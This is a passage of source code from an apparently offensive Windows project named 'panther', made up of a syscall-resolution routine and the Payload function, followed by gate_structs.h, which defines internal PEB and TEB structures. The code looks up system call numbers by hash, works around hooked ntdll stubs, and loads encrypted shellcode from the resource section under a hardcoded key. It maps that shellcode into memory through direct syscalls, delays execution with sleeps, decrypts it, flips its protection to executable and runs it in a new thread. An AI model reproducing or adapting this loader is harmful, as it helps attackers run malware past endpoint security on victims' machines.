136 | 	PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
137 | 	PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
138 | 
139 | 	for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
140 | 		PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
141 | 		PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
142 | 		if (djb2((PBYTE)pczFunctionName) == pVxTableEntry->dwHash) {
143 | 			pVxTableEntry->pAddress = pFunctionAddress;
144 | 
145 | 			if (*((PBYTE)pFunctionAddress) == 0x4c
146 | 				&& *((PBYTE)pFunctionAddress + 1) == 0x8b
147 | 				&& *((PBYTE)pFunctionAddress + 2) == 0xd1
148 | 				&& *((PBYTE)pFunctionAddress + 3) == 0xb8
149 | 				&& *((PBYTE)pFunctionAddress + 6) == 0x00
150 | 				&& *((PBYTE)pFunctionAddress + 7) == 0x00) {
151 | 
152 | 				BYTE high = *((PBYTE)pFunctionAddress + 5);
153 | 				BYTE low = *((PBYTE)pFunctionAddress + 4);
154 | 				pVxTableEntry->wSystemCall = (high << 8) | low;
155 | 
156 | 				return TRUE;
157 | 			}
158 | 
159 | 			if (*((PBYTE)pFunctionAddress) == 0xe9) {
160 | 				for (WORD idx = 1; idx <= 500; idx++) {
161 | 
162 | 					if (*((PBYTE)pFunctionAddress + idx * DOWN) == 0x4c
163 | 						&& *((PBYTE)pFunctionAddress + 1 + idx * DOWN) == 0x8b
164 | 						&& *((PBYTE)pFunctionAddress + 2 + idx * DOWN) == 0xd1
165 | 						&& *((PBYTE)pFunctionAddress + 3 + idx * DOWN) == 0xb8
166 | 						&& *((PBYTE)pFunctionAddress + 6 + idx * DOWN) == 0x00
167 | 						&& *((PBYTE)pFunctionAddress + 7 + idx * DOWN) == 0x00) {
168 | 						BYTE high = *((PBYTE)pFunctionAddress + 5 + idx * DOWN);
169 | 						BYTE low = *((PBYTE)pFunctionAddress + 4 + idx * DOWN);
170 | 						pVxTableEntry->wSystemCall = (high << 8) | low - idx;
171 | 
172 | 						return TRUE;
173 | 					}
174 | 
175 | 					if (*((PBYTE)pFunctionAddress + idx * UP) == 0x4c
176 | 						&& *((PBYTE)pFunctionAddress + 1 + idx * UP) == 0x8b
177 | 						&& *((PBYTE)pFunctionAddress + 2 + idx * UP) == 0xd1
178 | 						&& *((PBYTE)pFunctionAddress + 3 + idx * UP) == 0xb8
179 | 						&& *((PBYTE)pFunctionAddress + 6 + idx * UP) == 0x00
180 | 						&& *((PBYTE)pFunctionAddress + 7 + idx * UP) == 0x00) {
181 | 						BYTE high = *((PBYTE)pFunctionAddress + 5 + idx * UP);
182 | 						BYTE low = *((PBYTE)pFunctionAddress + 4 + idx * UP);
183 | 						pVxTableEntry->wSystemCall = (high << 8) | low + idx;
184 | 
185 | 						return TRUE;
186 | 					}
187 | 
188 | 				}
189 | 				return FALSE;
190 | 			}
191 | 			if (*((PBYTE)pFunctionAddress + 3) == 0xe9) {
192 | 				for (WORD idx = 1; idx <= 500; idx++) {
193 | 
194 | 					if (*((PBYTE)pFunctionAddress + idx * DOWN) == 0x4c
195 | 						&& *((PBYTE)pFunctionAddress + 1 + idx * DOWN) == 0x8b
196 | 						&& *((PBYTE)pFunctionAddress + 2 + idx * DOWN) == 0xd1
197 | 						&& *((PBYTE)pFunctionAddress + 3 + idx * DOWN) == 0xb8
198 | 						&& *((PBYTE)pFunctionAddress + 6 + idx * DOWN) == 0x00
199 | 						&& *((PBYTE)pFunctionAddress + 7 + idx * DOWN) == 0x00) {
200 | 						BYTE high = *((PBYTE)pFunctionAddress + 5 + idx * DOWN);
201 | 						BYTE low = *((PBYTE)pFunctionAddress + 4 + idx * DOWN);
202 | 						pVxTableEntry->wSystemCall = (high << 8) | low - idx;
203 | 						return TRUE;
204 | 					}
205 | 
206 | 					if (*((PBYTE)pFunctionAddress + idx * UP) == 0x4c
207 | 						&& *((PBYTE)pFunctionAddress + 1 + idx * UP) == 0x8b
208 | 						&& *((PBYTE)pFunctionAddress + 2 + idx * UP) == 0xd1
209 | 						&& *((PBYTE)pFunctionAddress + 3 + idx * UP) == 0xb8
210 | 						&& *((PBYTE)pFunctionAddress + 6 + idx * UP) == 0x00
211 | 						&& *((PBYTE)pFunctionAddress + 7 + idx * UP) == 0x00) {
212 | 						BYTE high = *((PBYTE)pFunctionAddress + 5 + idx * UP);
213 | 						BYTE low = *((PBYTE)pFunctionAddress + 4 + idx * UP);
214 | 						pVxTableEntry->wSystemCall = (high << 8) | low + idx;
215 | 						return TRUE;
216 | 					}
217 | 
218 | 				}
219 | 				return FALSE;
220 | 			}
221 | 		}
222 | 	}
223 | 
224 | 	return TRUE;
225 | }
226 | 
227 | 
228 | BOOL Payload(PVX_TABLE pVxTable) {
229 | 
230 | 	t_FindResourceW C_FindResourceW = (t_FindResourceW)C_GetProcAddr(C_GetModuleHandle(wstrkernel32), strFindResourceW);
231 | 	t_LoadResource C_LoadResource = (t_LoadResource)C_GetProcAddr(C_GetModuleHandle(wstrkernel32), strLoadResource);
232 | 	t_LockResource C_LockResource = (t_LockResource)C_GetProcAddr(C_GetModuleHandle(wstrkernel32), strLockResource);
233 | 	t_SizeofResource C_SizeofResource = (t_SizeofResource)C_GetProcAddr(C_GetModuleHandle(wstrkernel32), strSizeofResource);
234 | 
235 | 	// Generate a resource.rc & resource.h poiting to a file of binary (raw) type shellcode
236 | 	// .rsrc storage && .rsrc payload extraction
237 | 	HRSRC res = C_FindResourceW(NULL, MAKEINTRESOURCE(IDR_SCODE1), RT_RCDATA);
238 | 	HGLOBAL resHandle = C_LoadResource(NULL, res);
239 | 	unsigned char *payload = (unsigned char*)C_LockResource(resHandle);
240 | 	ULONG sSize = C_SizeofResource(NULL, res);
241 | 	
242 | 	// Decryption key for the shellcode
243 | 	const char key[] = { 'X','@','f','8','k','d','3','T','D','o','!','r','j','E' };
244 | 	SIZE_T sizeKey = sizeof(key);
245 | 
246 | 	NTSTATUS status = 0x00000000;
247 | 
248 | 	// -----------------
249 | 	//ULONG sSize = sizeof(payload);
250 | 	DWORD sectionSize = 4096*24;
251 | 	LARGE_INTEGER secSize = { sectionSize };
252 | 
253 | 	HANDLE hSection = NULL;
254 | 
255 | 	CreateGate(pVxTable->NtCreateSection.wSystemCall);
256 | 	status = GateDescent(
257 | 		&hSection,
258 | 		(SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE),
259 | 		NULL,
260 | 		(PLARGE_INTEGER)&secSize,
261 | 		PAGE_EXECUTE_READWRITE,
262 | 		SEC_COMMIT,
263 | 		NULL);
264 | 
265 | 	if (status != STATUS_SUCCESS) return EXIT_FAILURE;
266 | 	printf("[NTSTATUS] NtCreateSection -> \t( %#x )\n", status);
267 | 	printf("\t[+] Handle to created section -> \t( %#p )\n", hSection);
268 | 
269 | 	HANDLE hProcess = (HANDLE)-1;
270 | 	ULONG viewSize = 0;
271 | 	PVOID sectionAddr = NULL;
272 | 
273 | 	CreateGate(pVxTable->NtMapViewOfSection.wSystemCall);
274 | 	status = GateDescent(hSection, hProcess, &sectionAddr, NULL, NULL, NULL, &sectionSize, ViewUnmap, NULL, PAGE_READWRITE);
275 | 	if (status != STATUS_SUCCESS) return EXIT_FAILURE;
276 | 	printf("[NTSTATUS] Mapped section status -> ( %#x )\n\
277 | 		* Memory Address \t( %#p )\n\
278 | 		* Mapping Protection \t( RW )\n", status, sectionAddr);
279 | 
280 | 	SIZE_T writtenBytes = 0;
281 | 	CreateGate(pVxTable->NtWriteVirtualMemory.wSystemCall);
282 | 	status = GateDescent(hProcess, sectionAddr, payload, sSize, &writtenBytes);
283 | 	if (status != STATUS_SUCCESS) {
284 | 		CreateGate(pVxTable->NtClose.wSystemCall);
285 | 		status = GateDescent(hSection);
286 | 	}
287 | 	printf("[NTSTATUS] Wrote shellcode to memory: %#x\n", status);
288 | 	printf("\t\t& Written bytes: %lld\n", writtenBytes);
289 | 
290 | 	t_FreeResource C_FreeResource = (t_FreeResource)C_GetProcAddr(C_GetModuleHandle(wstrkernel32), strFreeResource);
291 | 	C_FreeResource(resHandle);
292 | 
293 | 	printf("[SLEEP] Sleeping 1st time for 25 seconds\n");
294 | 	time_t ttime = time(&ttime);
295 | 	
296 | 	LARGE_INTEGER SsTimeout;
297 | 	SsTimeout.QuadPart = -250000000;
298 | 	CreateGate(pVxTable->NtWaitForSingleObject.wSystemCall);
299 | 	status = GateDescent(hProcess, FALSE, &SsTimeout);
300 | 
301 | 	LARGE_INTEGER secondssincestart;
302 | 	secondssincestart.QuadPart = (LONGLONG)difftime(time(NULL), ttime);
303 | 	if (secondssincestart.QuadPart >= SsTimeout.QuadPart) {
304 | 		printf("[SLEEP] Slept for 25 Seconds\n");
305 | 		printf("[CRYPT] Starting Memory Decryption...\n");
306 | 
307 | 		if (f_SysCrypt032(sectionAddr, sSize, (char*)key, sizeKey) == TRUE) {
308 | 			printf("[CRYPT] Memory decrypted...\n");
309 | 
310 | 			CreateGate(pVxTable->NtUnmapViewOfSection.wSystemCall);
311 | 			status = GateDescent(hProcess, sectionAddr);
312 | 			if (status == STATUS_SUCCESS) {
313 | 				printf("[UNMAP] Unmapped section of shellcode\n");
314 | 			}
315 | 			else {
316 | 				CreateGate(pVxTable->NtClose.wSystemCall);
317 | 				status = GateDescent(hSection);
318 | 				return EXIT_FAILURE;
319 | 			}
320 | 		}
321 | 		else {
322 | 			printf("[CRYPT] Failure during memory decryption \t( %d )\n", GetLastError());
323 | 			return EXIT_FAILURE;
324 | 		}
325 | 	}
326 | 	else 
327 | 	{
328 | 		printf("[*] The program took: %lld seconds\n", secondssincestart.QuadPart);
329 | 		printf("[-] Something is wrong\n");
330 | 		return EXIT_FAILURE;
331 | 	}
332 | 
333 | 	time_t t2time = time(&t2time);
334 | 	LARGE_INTEGER S2sTimeout;
335 | 	S2sTimeout.QuadPart = -150000000;
336 | 
337 | 	printf("[SLEEP] Sleeping 2nd time for 15 seconds\n");
338 | 	CreateGate(pVxTable->NtWaitForSingleObject.wSystemCall);
339 | 	status = GateDescent(hProcess, FALSE, &S2sTimeout);
340 | 
341 | 	LARGE_INTEGER secondssincestart2;
342 | 	secondssincestart2.QuadPart = (LONGLONG)difftime(time(NULL), t2time);
343 | 	
344 | 	if (secondssincestart2.QuadPart >= S2sTimeout.QuadPart) {
345 | 		printf("[SLEEP] Slept for 15 Seconds\n");
346 | 		printf("[MAP] Starting Memory Remap...\n");
347 | 		
348 | 		CreateGate(pVxTable->NtMapViewOfSection.wSystemCall);
349 | 		status = GateDescent(hSection, hProcess, &sectionAddr, NULL, NULL, NULL, &sectionSize, ViewUnmap, NULL, PAGE_EXECUTE_READ);
350 | 		if (status != STATUS_SUCCESS) {
351 | 			CreateGate(pVxTable->NtClose.wSystemCall);
352 | 			status = GateDescent(hSection);
353 | 			return EXIT_FAILURE;
354 | 		}
355 | 		printf("[NTSTATUS] Remapped section status -> ( %#x )\n\
356 | 		* Memory Address \t( %#p )\n\
357 | 		* Mapping Protection \t( RX )\n", status, sectionAddr);
358 | 	}
359 | 	else 
360 | 	{
361 | 		printf("[*] The program took: %lld seconds\n", secondssincestart2.QuadPart);
362 | 		printf("[-] Something is wrong\n");
363 | 		return EXIT_FAILURE;
364 | 	}
365 | 
366 | 	printf("[*] Creating thread and executing....\n");
367 | 	HANDLE hHostThread = INVALID_HANDLE_VALUE;
368 | 	CreateGate(pVxTable->NtCreateThreadEx.wSystemCall);
369 | 	status = GateDescent(&hHostThread, GENERIC_ALL, NULL, hProcess, (LPTHREAD_START_ROUTINE)sectionAddr, NULL, FALSE, NULL, NULL, NULL, NULL);
370 | 
371 | 	LARGE_INTEGER ScTimeout;
372 | 	ScTimeout.QuadPart = -10000000;
373 | 	CreateGate(pVxTable->NtWaitForSingleObject.wSystemCall);
374 | 	status = GateDescent(hHostThread, FALSE, NULL);
375 | 
376 | 	return TRUE;
377 | }


--------------------------------------------------------------------------------
/panther/gate_structs.h:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | #include "headers.h"
  3 | 
  4 | /*=====================================================================
  5 | 							STRUCTURES
  6 | ======================================================================*/
  7 | typedef struct _LSA_UNICODE_STRING {
  8 | 	USHORT Length;
  9 | 	USHORT MaximumLength;
 10 | 	PWSTR  Buffer;
 11 | } LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING, * PUNICODE_STR;
 12 | 
 13 | typedef struct _LDR_MODULE {
 14 | 	LIST_ENTRY              InLoadOrderModuleList;
 15 | 	LIST_ENTRY              InMemoryOrderModuleList;
 16 | 	LIST_ENTRY              InInitializationOrderModuleList;
 17 | 	PVOID                   BaseAddress;
 18 | 	PVOID                   EntryPoint;
 19 | 	ULONG                   SizeOfImage;
 20 | 	UNICODE_STRING          FullDllName;
 21 | 	UNICODE_STRING          BaseDllName;
 22 | 	ULONG                   Flags;
 23 | 	SHORT                   LoadCount;
 24 | 	SHORT                   TlsIndex;
 25 | 	LIST_ENTRY              HashTableEntry;
 26 | 	ULONG                   TimeDateStamp;
 27 | } LDR_MODULE, * PLDR_MODULE;
 28 | 
 29 | typedef struct _PEB_LDR_DATA {
 30 | 	ULONG                   Length;
 31 | 	ULONG                   Initialized;
 32 | 	PVOID                   SsHandle;
 33 | 	LIST_ENTRY              InLoadOrderModuleList;
 34 | 	LIST_ENTRY              InMemoryOrderModuleList;
 35 | 	LIST_ENTRY              InInitializationOrderModuleList;
 36 | } PEB_LDR_DATA, * PPEB_LDR_DATA;
 37 | 
 38 | typedef struct _RTL_BITMAP
 39 | {
 40 | 	ULONG SizeOfBitMap;
 41 | 	ULONG* Buffer;
 42 | } RTL_BITMAP, * PRTL_BITMAP;
 43 | 
 44 | typedef struct _RTL_DRIVE_LETTER_CURDIR {
 45 | 
 46 | 	USHORT                  Flags;
 47 | 	USHORT                  Length;
 48 | 	ULONG                   TimeStamp;
 49 | 	UNICODE_STRING          DosPath;
 50 | 
 51 | } RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;
 52 | 
 53 | typedef struct _RTL_USER_PROCESS_PARAMETERS {
 54 | 
 55 | 	ULONG                   MaximumLength;
 56 | 	ULONG                   Length;
 57 | 	ULONG                   Flags;
 58 | 	ULONG                   DebugFlags;
 59 | 	PVOID                   ConsoleHandle;
 60 | 	ULONG                   ConsoleFlags;
 61 | 	HANDLE                  StdInputHandle;
 62 | 	HANDLE                  StdOutputHandle;
 63 | 	HANDLE                  StdErrorHandle;
 64 | 	UNICODE_STRING          CurrentDirectoryPath;
 65 | 	HANDLE                  CurrentDirectoryHandle;
 66 | 	UNICODE_STRING          DllPath;
 67 | 	UNICODE_STRING          ImagePathName;
 68 | 	UNICODE_STRING          CommandLine;
 69 | 	PVOID                   Environment;
 70 | 	ULONG                   StartingPositionLeft;
 71 | 	ULONG                   StartingPositionTop;
 72 | 	ULONG                   Width;
 73 | 	ULONG                   Height;
 74 | 	ULONG                   CharWidth;
 75 | 	ULONG                   CharHeight;
 76 | 	ULONG                   ConsoleTextAttributes;
 77 | 	ULONG                   WindowFlags;
 78 | 	ULONG                   ShowWindowFlags;
 79 | 	UNICODE_STRING          WindowTitle;
 80 | 	UNICODE_STRING          DesktopName;
 81 | 	UNICODE_STRING          ShellInfo;
 82 | 	UNICODE_STRING          RuntimeData;
 83 | 	RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20];
 84 | 
 85 | } RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
 86 | 
 87 | typedef struct _PEB
 88 | {
 89 | 	BOOLEAN                      InheritedAddressSpace;
 90 | 	BOOLEAN                      ReadImageFileExecOptions;
 91 | 	BOOLEAN                      BeingDebugged;
 92 | 	BOOLEAN                      SpareBool;
 93 | 	HANDLE                       Mutant;
 94 | 	HMODULE                      ImageBaseAddress;
 95 | 	PPEB_LDR_DATA                LdrData;
 96 | 	RTL_USER_PROCESS_PARAMETERS* ProcessParameters;
 97 | 	PVOID                        SubSystemData;
 98 | 	HANDLE                       ProcessHeap;
 99 | 	PRTL_CRITICAL_SECTION        FastPebLock;
100 | 	PVOID						 FastPebLockRoutine;
101 | 	PVOID						 FastPebUnlockRoutine;
102 | 	ULONG                        EnvironmentUpdateCount;
103 | 	PVOID                        KernelCallbackTable;
104 | 	PVOID                        EventLogSection;
105 | 	PVOID                        EventLog;
106 | 	PVOID						 FreeList;
107 | 	ULONG                        TlsExpansionCounter;
108 | 	PRTL_BITMAP                  TlsBitmap;
109 | 	ULONG                        TlsBitmapBits[2];
110 | 	PVOID                        ReadOnlySharedMemoryBase;
111 | 	PVOID                        ReadOnlySharedMemoryHeap;
112 | 	PVOID* ReadOnlyStaticServerData;
113 | 	PVOID                        AnsiCodePageData;
114 | 	PVOID                        OemCodePageData;
115 | 	PVOID                        UnicodeCaseTableData;
116 | 	ULONG                        NumberOfProcessors;
117 | 	ULONG                        NtGlobalFlag;
118 | 	BYTE                         Spare2[4];
119 | 	LARGE_INTEGER                CriticalSectionTimeout;
120 | 	ULONG                        HeapSegmentReserve;
121 | 	ULONG                        HeapSegmentCommit;
122 | 	ULONG                        HeapDeCommitTotalFreeThreshold;
123 | 	ULONG                        HeapDeCommitFreeBlockThreshold;
124 | 	ULONG                        NumberOfHeaps;
125 | 	ULONG                        MaximumNumberOfHeaps;
126 | 	PVOID*						 ProcessHeaps;
127 | 	PVOID                        GdiSharedHandleTable;
128 | 	PVOID                        ProcessStarterHelper;
129 | 	PVOID                        GdiDCAttributeList;
130 | 	PVOID                        LoaderLock;
131 | 	ULONG                        OSMajorVersion;
132 | 	ULONG                        OSMinorVersion;
133 | 	ULONG                        OSBuildNumber;
134 | 	ULONG                        OSPlatformId;
135 | 	ULONG                        ImageSubSystem;
136 | 	ULONG                        ImageSubSystemMajorVersion;
137 | 	ULONG                        ImageSubSystemMinorVersion;
138 | 	ULONG                        ImageProcessAffinityMask;
139 | 	ULONG                        GdiHandleBuffer[34];
140 | 	ULONG                        PostProcessInitRoutine;
141 | 	PRTL_BITMAP                  TlsExpansionBitmap;
142 | 	ULONG                        TlsExpansionBitmapBits[32];
143 | 	ULONG                        SessionId;
144 | 
145 | } PEB, * PPEB;
146 | 
147 | typedef struct __CLIENT_ID {
148 | 	HANDLE UniqueProcess;
149 | 	HANDLE UniqueThread;
150 | } CLIENT_ID, * PCLIENT_ID;
151 | 
152 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
153 | 	ULONG Flags;
154 | 	PCHAR FrameName;
155 | } TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
156 | 
157 | typedef struct _TEB_ACTIVE_FRAME {
158 | 	ULONG Flags;
159 | 	struct _TEB_ACTIVE_FRAME* Previous;
160 | 	PTEB_ACTIVE_FRAME_CONTEXT Context;
161 | } TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
162 | 
163 | typedef struct _GDI_TEB_BATCH {
164 | 	ULONG Offset;
165 | 	ULONG HDC;
166 | 	ULONG Buffer[310];
167 | } GDI_TEB_BATCH, * PGDI_TEB_BATCH;
168 | 
169 | typedef PVOID PACTIVATION_CONTEXT;
170 | 
171 | typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
172 | 	struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
173 | 	PACTIVATION_CONTEXT ActivationContext;
174 | 	ULONG Flags;
175 | } RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
176 | 
177 | typedef struct _ACTIVATION_CONTEXT_STACK {
178 | 	PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
179 | 	LIST_ENTRY FrameListCache;
180 | 	ULONG Flags;
181 | 	ULONG NextCookieSequenceNumber;
182 | 	ULONG StackId;
183 | } ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
184 | 
185 | typedef struct _TEB {
186 | 	NT_TIB				NtTib;
187 | 	PVOID				EnvironmentPointer;
188 | 	CLIENT_ID			ClientId;
189 | 	PVOID				ActiveRpcHandle;
190 | 	PVOID				ThreadLocalStoragePointer;
191 | 	PPEB				ProcessEnvironmentBlock;
192 | 	ULONG               LastErrorValue;
193 | 	ULONG               CountOfOwnedCriticalSections;
194 | 	PVOID				CsrClientThread;
195 | 	PVOID				Win32ThreadInfo;
196 | 	ULONG               User32Reserved[26];
197 | 	ULONG               UserReserved[5];
198 | 	PVOID				WOW32Reserved;
199 | 	LCID                CurrentLocale;
200 | 	ULONG               FpSoftwareStatusRegister;
201 | 	PVOID				SystemReserved1[54];
202 | 	LONG                ExceptionCode;
203 | #if (NTDDI_VERSION >= NTDDI_LONGHORN)
204 | 	PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
205 | 	UCHAR                  SpareBytes1[0x30 - 3 * sizeof(PVOID)];
206 | 	ULONG                  TxFsContext;
207 | #elif (NTDDI_VERSION >= NTDDI_WS03)
208 | 	PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
209 | 	UCHAR                  SpareBytes1[0x34 - 3 * sizeof(PVOID)];
210 | #else
211 | 	ACTIVATION_CONTEXT_STACK ActivationContextStack;
212 | 	UCHAR                  SpareBytes1[24];
213 | #endif
214 | 	GDI_TEB_BATCH			GdiTebBatch;
215 | 	CLIENT_ID				RealClientId;
216 | 	PVOID					GdiCachedProcessHandle;
217 | 	ULONG                   GdiClientPID;
218 | 	ULONG                   GdiClientTID;
219 | 	PVOID					GdiThreadLocalInfo;
220 | 	PSIZE_T					Win32ClientInfo[62];
221 | 	PVOID					glDispatchTable[233];
222 | 	PSIZE_T					glReserved1[29];
223 | 	PVOID					glReserved2;
224 | 	PVOID					glSectionInfo;
225 | 	PVOID					glSection;
226 | 	PVOID					glTable;
227 | 	PVOID					glCurrentRC;
228 | 	PVOID					glContext;
229 | 	NTSTATUS                LastStatusValue;
230 | 	UNICODE_STRING			StaticUnicodeString;
231 | 	WCHAR                   StaticUnicodeBuffer[261];
232 | 	PVOID					DeallocationStack;
233 | 	PVOID					TlsSlots[64];
234 | 	LIST_ENTRY				TlsLinks;
235 | 	PVOID					Vdm;
236 | 	PVOID					ReservedForNtRpc;
237 | 	PVOID					DbgSsReserved[2];
238 | #if (NTDDI_VERSION >= NTDDI_WS03)
239 | 	ULONG                   HardErrorMode;
240 | #else
241 | 	ULONG                  HardErrorsAreDisabled;
242 | #endif
243 | #if (NTDDI_VERSION >= NTDDI_LONGHORN)
244 | 	PVOID					Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
245 | 	GUID                    ActivityId;
246 | 	PVOID					SubProcessTag;
247 | 	PVOID					EtwLocalData;
248 | 	PVOID					EtwTraceData;
249 | #elif (NTDDI_VERSION >= NTDDI_WS03)
250 | 	PVOID					Instrumentation[14];
251 | 	PVOID					SubProcessTag;
252 | 	PVOID					EtwLocalData;
253 | #else
254 | 	PVOID					Instrumentation[16];
255 | #endif
256 | 	PVOID					WinSockData;
257 | 	ULONG					GdiBatchCount;
258 | #if (NTDDI_VERSION >= NTDDI_LONGHORN)
259 | 	BOOLEAN                SpareBool0;
260 | 	BOOLEAN                SpareBool1;
261 | 	BOOLEAN                SpareBool2;
262 | #else
263 | 	BOOLEAN                InDbgPrint;
264 | 	BOOLEAN                FreeStackOnTermination;
265 | 	BOOLEAN                HasFiberData;
266 | #endif
267 | 	UCHAR                  IdealProcessor;
268 | #if (NTDDI_VERSION >= NTDDI_WS03)
269 | 	ULONG                  GuaranteedStackBytes;
270 | #else
271 | 	ULONG                  Spare3;
272 | #endif
273 | 	PVOID				   ReservedForPerf;
274 | 	PVOID				   ReservedForOle;
275 | 	ULONG                  WaitingOnLoaderLock;
276 | #if (NTDDI_VERSION >= NTDDI_LONGHORN)
277 | 	PVOID				   SavedPriorityState;
278 | 	ULONG_PTR			   SoftPatchPtr1;
279 | 	ULONG_PTR			   ThreadPoolData;
280 | #elif (NTDDI_VERSION >= NTDDI_WS03)
281 | 	ULONG_PTR			   SparePointer1;
282 | 	ULONG_PTR              SoftPatchPtr1;
283 | 	ULONG_PTR              SoftPatchPtr2;
284 | #else
285 | 	Wx86ThreadState        Wx86Thread;
286 | #endif
287 | 	PVOID* TlsExpansionSlots;
288 | #if defined(_WIN64) && !defined(EXPLICIT_32BIT)
289 | 	PVOID                  DeallocationBStore;
290 | 	PVOID                  BStoreLimit;
291 | #endif
292 | 	ULONG                  ImpersonationLocale;
293 | 	ULONG                  IsImpersonating;
294 | 	PVOID                  NlsCache;
295 | 	PVOID                  pShimData;
296 | 	ULONG                  HeapVirtualAffinity;
297 | 	HANDLE                 CurrentTransactionHandle;
298 | 	PTEB_ACTIVE_FRAME      ActiveFrame;
299 | #if (NTDDI_VERSION >= NTDDI_WS03)
300 | 	PVOID FlsData;
301 | #endif
302 | #if (NTDDI_VERSION >= NTDDI_LONGHORN)
303 | 	PVOID PreferredLangauges;
304 | 	PVOID UserPrefLanguages;
305 | 	PVOID MergedPrefLanguages;
306 | 	ULONG MuiImpersonation;
307 | 	union
308 | 	{
309 | 		struct
310 | 		{
311 | 			USHORT SpareCrossTebFlags : 16;
312 | 		};
313 | 		USHORT CrossTebFlags;
314 | 	};
315 | 	union
316 | 	{
317 | 		struct
318 | 		{
319 | 			USHORT DbgSafeThunkCall : 1;
320 | 			USHORT DbgInDebugPrint : 1;
321 | 			USHORT DbgHasFiberData : 1;
322 | 			USHORT DbgSkipThreadAttach : 1;
323 | 			USHORT DbgWerInShipAssertCode : 1;
324 | 			USHORT DbgIssuedInitialBp : 1;
325 | 			USHORT DbgClonedThread : 1;
326 | 			USHORT SpareSameTebBits : 9;
327 | 		};
328 | 		USHORT SameTebFlags;
329 | 	};
330 | 	PVOID TxnScopeEntercallback;
331 | 	PVOID TxnScopeExitCAllback;
332 | 	PVOID TxnScopeContext;
333 | 	ULONG LockCount;
334 | 	ULONG ProcessRundown;
335 | 	ULONG64 LastSwitchTime;
336 | 	ULONG64 TotalSwitchOutTime;
337 | 	LARGE_INTEGER WaitReasonBitMap;
338 | #else
339 | 	BOOLEAN SafeThunkCall;
340 | 	BOOLEAN BooleanSpare[3];
341 | #endif
342 | } TEB, * PTEB;
343 | 
344 | typedef struct _LDR_DATA_TABLE_ENTRY {
345 | 	LIST_ENTRY InLoadOrderLinks;
346 | 	LIST_ENTRY InMemoryOrderLinks;
347 | 	LIST_ENTRY InInitializationOrderLinks;
348 | 	PVOID DllBase;
349 | 	PVOID EntryPoint;
350 | 	ULONG SizeOfImage;
351 | 	UNICODE_STRING FullDllName;
352 | 	UNICODE_STRING BaseDllName;
353 | 	ULONG Flags;
354 | 	WORD LoadCount;
355 | 	WORD TlsIndex;
356 | 	union {
357 | 		LIST_ENTRY HashLinks;
358 | 		struct {
359 | 			PVOID SectionPointer;
360 | 			ULONG CheckSum;
361 | 		};
362 | 	};
363 | 	union {
364 | 		ULONG TimeDateStamp;
365 | 		PVOID LoadedImports;
366 | 	};
367 | 	PACTIVATION_CONTEXT EntryPointActivationContext;
368 | 	PVOID PatchInformation;
369 | 	LIST_ENTRY ForwarderLinks;
370 | 	LIST_ENTRY ServiceTagLinks;
371 | 	LIST_ENTRY StaticLinks;
372 | } LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
373 | 
374 | typedef struct _OBJECT_ATTRIBUTES {
375 | 	ULONG Length;
376 | 	PVOID RootDirectory;
377 | 	PUNICODE_STRING ObjectName;
378 | 	ULONG Attributes;
379 | 	PVOID SecurityDescriptor;
380 | 	PVOID SecurityQualityOfService;
381 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
382 | 
383 | typedef struct _INITIAL_TEB {
384 | 	PVOID                StackBase;
385 | 	PVOID                StackLimit;
386 | 	PVOID                StackCommit;
387 | 	PVOID                StackCommitMax;
388 | 	PVOID                StackReserved;
389 | } INITIAL_TEB, * PINITIAL_TEB;
390 | 
391 | typedef struct _WTS_PROCESS_INFOW {
392 | 	DWORD SessionId;     
393 | 	DWORD ProcessId;     
394 | 	LPWSTR pProcessName; 
395 | 	PSID pUserSid;       
396 | } WTS_PROCESS_INFOW, * PWTS_PROCESS_INFOW;
397 | 
398 | typedef struct _WTS_PROCESS_INFOA {
399 | 	DWORD SessionId;     
400 | 	DWORD ProcessId;    
401 | 	LPSTR pProcessName;  
402 | 	PSID pUserSid;       
403 | } WTS_PROCESS_INFOA, * PWTS_PROCESS_INFOA;
404 | 
405 | #ifdef UNICODE
406 | #define WTS_PROCESS_INFO  WTS_PROCESS_INFOW
407 | #define PWTS_PROCESS_INFO PWTS_PROCESS_INFOW
408 | #else
409 | #define WTS_PROCESS_INFO  WTS_PROCESS_INFOA
410 | #define PWTS_PROCESS_INFO PWTS_PROCESS_INFOA
411 | #endif
412 | 


--------------------------------------------------------------------------------